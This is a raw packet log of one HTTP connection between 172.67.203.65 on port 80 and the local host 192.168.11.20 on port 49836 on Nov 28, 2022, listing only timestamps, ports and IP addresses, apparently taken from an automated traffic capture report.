Nov 28, 2022 12:46:58.210120916 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210138083 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210150957 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210161924 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210167885 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.210172892 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210186005 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210196972 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210207939 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210217953 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210231066 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210242987 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210253000 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210263968 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210268021 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.210273027 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210283995 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210294962 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210304976 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210315943 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210320950 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.210326910 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210338116 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210349083 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210359097 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210370064 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210407019 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210438013 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.210464954 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210477114 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210486889 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210503101 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210516930 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210527897 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210541010 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210570097 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210582018 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210592985 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.210596085 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210608959 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210621119 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210632086 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210644007 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210655928 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210665941 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210678101 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210689068 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210709095 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.210726023 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210737944 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210750103 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210762024 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210772991 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210829973 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210841894 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210853100 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210865021 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210876942 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210887909 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210900068 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210911036 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210922956 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210932970 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.210933924 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210946083 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210958004 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210973978 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210982084 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.210985899 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.211113930 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.223928928 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224030018 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224042892 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224056005 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224075079 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.224081039 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224092960 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224104881 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224116087 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224128008 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224139929 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224183083 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224195004 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224206924 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224219084 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224231005 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224241972 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224253893 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224267960 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224272013 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.224280119 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224319935 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.224376917 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224390030 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224394083 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.224430084 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224443913 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224459887 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224462032 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.224472046 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224483013 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224495888 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224509001 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224519968 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224531889 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224545956 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224558115 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224570036 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224581003 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224592924 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224605083 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224616051 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224623919 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.224627972 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224639893 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224651098 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224661112 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224672079 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.224673033 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224684000 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224695921 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224706888 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224719048 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224731922 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224744081 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224756002 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224766970 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224771976 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.224783897 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224797010 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224807978 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224818945 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224833012 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224843979 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224855900 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224868059 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224881887 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224891901 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.224894047 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224905014 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224916935 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224927902 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.224937916 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.225008965 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.225199938 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.229567051 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.229655027 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.229705095 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.229716063 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.229727030 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.229737997 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.229748964 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.229758024 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.229780912 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.229792118 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.229803085 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.229814053 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.229824066 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.229835033 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.229857922 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.229871035 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.229882002 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.229892969 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.229902983 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.229913950 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.229924917 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.229924917 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.229935884 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.229947090 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.229958057 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.229968071 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.229979038 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.229988098 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.229995966 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.229999065 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230124950 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.230206013 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230217934 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230230093 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230242014 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230252981 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230261087 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.230264902 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230277061 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230288029 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230299950 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230312109 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230324030 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230334997 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230346918 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230357885 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230360031 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.230372906 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230386019 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230397940 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230410099 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230427027 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.230453014 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230463982 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230475903 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230488062 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230499029 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230510950 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230523109 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230534077 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230545998 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230556965 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230571032 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230582952 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230595112 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230606079 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230612040 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.230618000 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230629921 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230642080 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230660915 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.230710983 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230722904 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230735064 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230746984 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230763912 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230776072 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.230914116 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.231003046 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.241772890 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.241935015 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.242063046 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242074966 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242084980 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242095947 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242106915 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242117882 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242129087 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242141962 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242152929 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242163897 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242175102 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242186069 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242197037 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242207050 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242218018 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242228031 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242238998 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242249012 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242257118 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.242259979 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242311001 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.242345095 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.242486954 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242497921 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242508888 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242520094 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242523909 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.242532969 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242542028 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242552996 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242563963 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242574930 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242584944 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242595911 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242605925 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242616892 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242628098 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242655039 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.242702961 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.242736101 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242748022 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242759943 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242772102 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242783070 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242794037 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242804050 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242818117 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242829084 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242840052 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242849112 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.242851019 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242861986 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242872953 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242883921 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.242938042 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.242993116 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.243005991 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.243016958 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.243026018 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.243036985 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.243046999 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.243057966 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.243181944 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.243230104 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.290471077 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290643930 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.290669918 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290682077 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290693045 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290704012 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290714025 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290724993 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290735960 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290746927 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290756941 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290767908 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290779114 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290788889 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290791988 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.290800095 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290811062 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290822029 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290832996 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290843010 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290853977 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290864944 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290872097 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.290875912 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290885925 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290896893 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290908098 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290919065 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290927887 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290939093 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290946960 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.290950060 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290961027 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290971041 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.290982008 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291070938 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.291090965 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291101933 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291112900 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291124105 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291135073 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291145086 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291156054 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291167021 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291177988 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291188002 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291198969 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291209936 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291228056 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291237116 CET	49836	80	192.168.11.20	172.67.203.65
